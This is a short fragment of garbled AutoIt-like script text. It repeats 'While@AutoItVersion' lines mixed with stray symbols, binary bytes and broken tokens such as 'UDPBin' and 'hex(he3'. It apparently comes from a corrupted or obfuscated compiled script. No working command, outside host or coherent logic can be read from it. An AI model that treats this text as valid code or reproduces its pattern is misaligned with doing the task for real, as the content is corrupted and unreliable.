I]netC
While@AutoItVersion$o$0$2$R$b+''WEnd$3$R'+>'+''W2$R¢$b
While@AutoItVersion$o$0$2$R$b+''WEnd$hile$n-.0$2$R$Y$n$R$2$R$b
While@AutoItVersion$o$0$2$R$b+''WEnd$3$R'+$2¤R$b+''WEormatile$n-.0$2$R$Y+'UDPBin$bdc())+''2$R$b
While@AutoItVersion$o$0$2$R$b+''WEnd$3$RlR¢$b
While@AutoItVersion$o$0$2$R$b+''WEnd$3$R'+>'+''W
.0$2$R$$R$2$0R$b
While@AutoItVersion$o$0$2$R$b+''WEnd$3$R'+$?1R$b+''WEnd$3$R'ÿÿÿÿile$n$R$2$R$b
While@AutoItVersion$o$0$2$R$b+''WEnd$4$R'+'+''While n$2
Wh2$R$b
While@AutoItVersion$o$0$2$R$b+''WEnd$hex(he3$Rle@d$3$Rsg2$R$Y+'U